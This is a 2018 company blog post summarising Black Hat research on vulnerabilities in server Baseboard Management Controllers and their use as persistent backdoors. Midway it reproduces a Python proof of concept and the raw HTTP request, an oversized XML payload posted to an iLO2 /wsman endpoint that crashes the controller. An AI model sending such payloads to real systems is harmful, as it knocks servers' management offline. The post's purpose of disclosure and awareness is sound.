Data Centre Backdoors

Written by:
Hyve
Date Posted:
10 August 2018

The move to the cloud has made data centres vital parts of enterprise life. However, certain remote management access can deliver simple access to servers. 

Baseboard Management Controllers (BMC) are generally utilised in companies as a devoted channel for device maintenance. They give SysAdmins adaptable capabilities to remotely remotely monitor power use, system temperature, fan speed and chassis health status.

The most important BMC capacities are those that permit remote access and setup of the server. This incorporates remotely rebooting the server and additionally setting up an direct serial association or KVM (Keyboard, Video and Mouse) access. Combined with network protocols, for example, IPMI, SSH and VNC, this makes a BMC the perfect answer for both remote administration and DR. All things considered it is widely deployed in numerous Out Of Band (OOB) management networks and particularly in data centres to minimise on-site admin. 

New Research

In a new paper presented at Black Hat USA yesterday, authors by security researchers Matias Soler and Nicolas Waisman showed how BMCs can be used nefariously. 

They explain in their paper how they discovered 3 critical vulnerabilities in the most popular BMC devices from the largest suppliers that allow remote compromise of the devices. They demonstrate these attacks and also show how a BMC can become the perfect backdoor. 

Every big name server vendor provides some kind of BMC for their servers. Dell has the Integrated Dell Remote Access Controller (iDRAC), Lenovo and IBM the Integrated Management Module (IMM) and HP provides the Integrated Light Outs (ILO) solution. They mostly depend upon specific vendor-devised protocols. 

You’re not as safe as you though you were

People had mistakenly thought that because the BMC is hidden safely behind multiple security layers it was safe. However, because the BMC is responsible for the interconnectivity, it is vulnerable. It will allow bidirectional movement from the BMC to the host. 

The paper states:

An attacker with privileged access to a host can compromise its BMC even if it is fully patched, without the need for credentials, thus providing them with a foothold on the management network. An attacker with a foothold on the management network that finds a vulnerable BMC or has credentials to one, can compromise its host.

The main issue is that when a Bad Actor gets inside a data centre network, the vulnerabilities inherent in BMC technology could be used to take control of more systems and install malware that will be persistent even if you reboot or even reinstall the OS.

One example of a possible attack follows. If this request to an iLO2 embedded system will start the vulnerability and force a crash on a BMC processor. 

import requests

headers = {‘Content-Type’: ‘application/soap+xml;charset=UTF-8’}

payload = “<x:” + “B” * 0x300 + “>\n</x>”

r = requests.post(‘https://192.168.1.250/wsman’, data=payload, verify=False,

headers=headers)

print r.text

Request: 

POST /wsman HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MSBrowserIE; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: xxxxx
Content-Length: 792
Content-Type: application/soap+xml;charset=UTF-8 <x:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB>
</x>

When the request is sent, it stops interaction with the iLO2. All services such as ping, web console, SSH, and telnet will be offline. 

The paper concluded:

From an offensive perspective, even though the various BMC platforms may require significant research investments, the results are worth the endeavour. A culture of empirically proven low-quality vendor software make BMCs a prime target. BMCs can facilitate long term persistence as well as cross-network movement that bypasses most network security design. It is very hard, if not impossible, for any sufficiently sized company to move away from BMCs. As such, it is time for BMC vendors to revisit 2002, read the famous Trustworthy Computing memo6 and realize that anno 2018 sprintf based stack overflows really should be a thing of the past in any platform that supports mission critical infrastructure.
Rating: 5.0/5. From 1 vote.
Please wait...

Learn how Medichecks were able to grow

Case Studies


Hyve are 100% carbon neutral. We use carbon offsetting to balance out the release of carbon dioxide from our offices and infrastructure.